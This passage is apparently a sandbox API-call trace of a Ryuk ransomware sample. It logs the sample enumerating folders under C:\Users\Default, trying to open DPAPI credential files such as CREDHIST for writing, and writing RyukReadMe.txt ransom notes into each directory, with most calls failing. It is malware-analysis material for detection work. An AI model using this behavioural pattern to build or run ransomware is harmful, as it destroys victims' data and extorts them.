lpFindFileData=0x29abb30) returned 1 [0159.966] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.966] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.966] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST", dwFileAttributes=0x80) returned 0 [0159.967] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.967] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.967] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.968] SetLastError (dwErrCode=0x0) [0159.968] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.968] GetLastError () returned 0x5 [0159.968] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.968] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.968] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.970] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.970] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.970] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", dwFileAttributes=0x80) returned 0 [0159.971] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.971] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.971] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.971] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.971] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred", dwFileAttributes=0x80) returned 0 [0159.971] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.972] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.972] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.973] SetLastError (dwErrCode=0x0) [0159.973] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.976] GetLastError () returned 0x5 [0159.976] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.976] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.976] SetLastError (dwErrCode=0x0) [0159.976] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.976] GetLastError () returned 0x5 [0159.976] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.976] SetLastError (dwErrCode=0x0) [0159.977] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.977] GetLastError () returned 0x5 [0159.977] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.977] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.977] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.977] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.977] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.977] SetLastError (dwErrCode=0x0) [0159.977] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.977] GetLastError () returned 0x5 [0159.977] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.977] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.977] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.978] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.978] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.978] SetLastError (dwErrCode=0x0) [0159.978] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.978] GetLastError () returned 0x5 [0159.978] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.978] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.978] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0159.978] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.978] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0159.978] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0159.978] SetLastError (dwErrCode=0x0) [0159.978] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.979] GetLastError () returned 0x5 [0159.979] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.979] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.979] SetLastError (dwErrCode=0x0) [0159.979] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.979] GetLastError () returned 0x5 [0159.979] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.979] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.979] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0159.979] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.979] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0159.979] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0159.979] SetLastError (dwErrCode=0x0) [0159.979] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.980] GetLastError () returned 0x5 [0159.980] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.980] SetLastError (dwErrCode=0x0) [0159.980] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.980] GetLastError () returned 0x5 [0159.980] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.980] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0159.980] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0159.980] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0159.980] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0159.980] SetLastError (dwErrCode=0x0) [0159.980] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.981] GetLastError () returned 0x5 [0159.981] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0159.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.981] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.981] SetLastError (dwErrCode=0x0) [0159.981] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.981] GetLastError () returned 0x5 [0159.981] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.981] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.981] SetLastError (dwErrCode=0x0) [0159.981] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.981] GetLastError () returned 0x5 [0159.981] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.982] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.982] SetLastError (dwErrCode=0x0) [0159.982] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.982] GetLastError () returned 0x5 [0159.982] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.982] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.982] SetLastError (dwErrCode=0x0) [0159.982] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.982] GetLastError () returned 0x5 [0159.982] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.982] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.982] SetLastError (dwErrCode=0x0) [0159.982] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.983] GetLastError () returned 0x5 [0159.983] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.983] SetLastError (dwErrCode=0x0) [0159.983] CreateFileW (lpFileName="C:\\Users\\Default\\RyukReadMe.txt" (normalized: "c:\\users\\default\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.983] GetLastError () returned 0x5 [0159.983] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.983] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0159.983] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.983] SetLastError (dwErrCode=0x0) [0159.983] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\RyukReadMe.txt" (normalized: "c:\\users\\default\\application data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.983] GetLastError () returned 0x5 [0159.983] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.984] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.984] SetLastError (dwErrCode=0x0) [0159.984] CreateFileW (lpFileName="C:\\Users\\Default\\RyukReadMe.txt" (normalized: "c:\\users\\default\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.984] GetLastError () returned 0x5 [0159.984] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.984] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.984] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.985] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.985] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.985] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.985] SetLastError (dwErrCode=0x0) [0159.985] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\RyukReadMe.txt" (normalized: "c:\\users\\default\\contacts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.985] GetLastError () returned 0x5 [0159.985] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.985] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.985] SetLastError (dwErrCode=0x0) [0159.986] CreateFileW (lpFileName="C:\\Users\\Default\\RyukReadMe.txt" (normalized: "c:\\users\\default\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.986] GetLastError () returned 0x5 [0159.986] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.986] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0159.986] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.986] SetLastError (dwErrCode=0x0) [0159.986] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\RyukReadMe.txt" (normalized: "c:\\users\\default\\cookies\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.991] GetLastError () returned 0x5 [0159.991] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.991] SetLastError (dwErrCode=0x0) [0159.991] CreateFileW (lpFileName="C:\\Users\\Default\\RyukReadMe.txt" (normalized: "c:\\users\\default\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.991] GetLastError () returned 0x5 [0159.991] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.991] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.991] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.991] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.992] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.992] SetLastError (dwErrCode=0x0) [0159.992] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\RyukReadMe.txt" (normalized: "c:\\users\\default\\desktop\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.992] GetLastError () returned 0x5 [0159.992] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.992] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.992] SetLastError (dwErrCode=0x0) [0159.992] CreateFileW (lpFileName="C:\\Users\\Default\\RyukReadMe.txt" (normalized: "c:\\users\\default\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.992] GetLastError () returned 0x5 [0159.992] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.992] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.992] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.993] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 